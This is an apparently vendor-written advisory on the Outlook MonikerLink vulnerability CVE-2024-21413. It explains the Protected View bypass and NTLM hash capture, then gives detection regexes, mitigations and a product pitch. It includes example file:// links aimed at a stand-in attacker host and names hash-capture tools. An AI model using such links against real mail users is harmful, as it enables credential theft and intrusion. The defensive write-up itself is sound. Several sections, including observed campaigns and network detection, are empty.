Critical CVE-2024-21413 January 2026 · 8 min read

CVE-2024-21413: Microsoft Outlook MonikerLink RCE

Dubbed "MonikerLink," CVE-2024-21413 is a critical Microsoft Outlook vulnerability that bypasses Protected View to achieve remote code execution and NTLM credential theft — simply by previewing a malicious email. CVSS 9.8 CRITICAL. No user interaction beyond email preview required.


9.8
CRITICAL
AttributeValue
CVE IDCVE-2024-21413
CVSS VectorAV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-20: Improper Input Validation
PublishedFebruary 13, 2024
ExploitationPublic PoC — widely exploited

What Is CVE-2024-21413?

CVE-2024-21413 exploits the way Microsoft Outlook handles hyperlinks containing the ! (exclamation mark) character as part of a file moniker URI. Normally, Outlook applies "Protected View" to documents opened from email — sandboxing Office documents to prevent code execution. This vulnerability bypasses that protection entirely.

By crafting a hyperlink in the format file://ATTACKER-SERVER/test.rtf!something, an attacker causes Outlook to open the RTF file without Protected View, while simultaneously triggering an automatic NTLM authentication attempt to the attacker's SMB server. The attacker captures the NTLMv2 hash for offline cracking or relay attacks.

🚨 Preview Pane Attack — No Click Required

This vulnerability triggers in the Outlook Preview Pane. The victim only needs to select the email in their inbox — no attachment opening, no link clicking required. In a corporate environment, a single phishing email sent to a distribution list could compromise hundreds of NTLMv2 hashes simultaneously.

Affected Products

ProductAffected Versions
Microsoft Outlook 2016Before February 2024 update
Microsoft Outlook 2019Before February 2024 update
Microsoft Outlook LTSC 2021Before February 2024 update
Microsoft 365 Apps for EnterpriseBefore February 2024 update

Not affected: Outlook on the web (OWA), Outlook for iOS/Android, Outlook for Mac. The vulnerability is specific to Windows desktop Outlook clients.

Attack Mechanics: The MonikerLink Technique

Windows COM (Component Object Model) uses "monikers" to bind to objects by name. The file:// URI scheme in Windows can include a moniker component after the ! character, which instructs Windows to load and activate the referenced COM object.

# Normal file link — Protected View applied
file://attacker.com/share/document.rtf

# MonikerLink bypass — ! bypasses Protected View
file://attacker.com/share/document.rtf!1337

# When Outlook processes the MonikerLink:
# 1. Attempts SMB connection to attacker.com
# 2. Sends NTLMv2 authentication (captures hash)
# 3. Opens file without Protected View
# 4. If file is malicious RTF → RCE

NTLM Hash Capture Flow

Even without a weaponized RTF file, the NTLM relay attack is impactful:

  1. Victim previews malicious email in Outlook
  2. Outlook makes automatic SMB connection to attacker-controlled server
  3. Windows sends NTLMv2 challenge-response (hash) to authenticate
  4. Attacker captures hash with Responder, Impacket, or similar tools
  5. Hash cracked offline (weak passwords in hours) or relayed in real-time to other services

Real-World Exploitation

Following public PoC release, CVE-2024-21413 was incorporated into commercial phishing toolkits within days. Observed campaigns included:

Detection

Email Gateway Rules

# Regex pattern for MonikerLink in email body/attachments
# Detect file:// links containing ! character
\bfile:\/\/[^\s"']+![^\s"']*

# Block external UNC/file links entirely (recommended)
\bfile:\/\/[^\s"']+
\\\\[a-z0-9.-]+\\

Network Detection

Endpoint Detection

Mitigation

  1. Apply February 2024 patches: Microsoft Security Update for Outlook addresses the Protected View bypass
  2. Block SMB outbound at perimeter: Firewall rules blocking TCP/445 and TCP/139 outbound prevent NTLM hash capture even if the vulnerability triggers
  3. Enable NTLM relay protections: Configure SMB signing and LDAP signing to prevent relay attacks
  4. Deploy Email Security Gateway: Block emails containing file:// and \\ (UNC path) links in body and attachments
  5. Disable NTLM where possible: Organizations using Kerberos can disable NTLM to eliminate the hash capture attack path

💡 Defense in Depth: Even if you've patched Outlook, blocking outbound SMB at the firewall is a best practice that prevents this entire class of attacks. Many organizations allow outbound SMB for legacy file sharing reasons — audit and restrict this immediately.

KENSAI Detection Capability

Are Your Outlook Clients Patched Against MonikerLink?

KENSAI scans your endpoint fleet for vulnerable Outlook versions and identifies network paths that would enable NTLM hash capture. Get visibility in minutes.

Assess Your Email Attack Surface →

Related Articles

ISO 27001 Vulnerability Management & Certification Assessment Security Platform Security Blog Microsoft Patch Tuesday 84 ثغرة، هجوم Stryker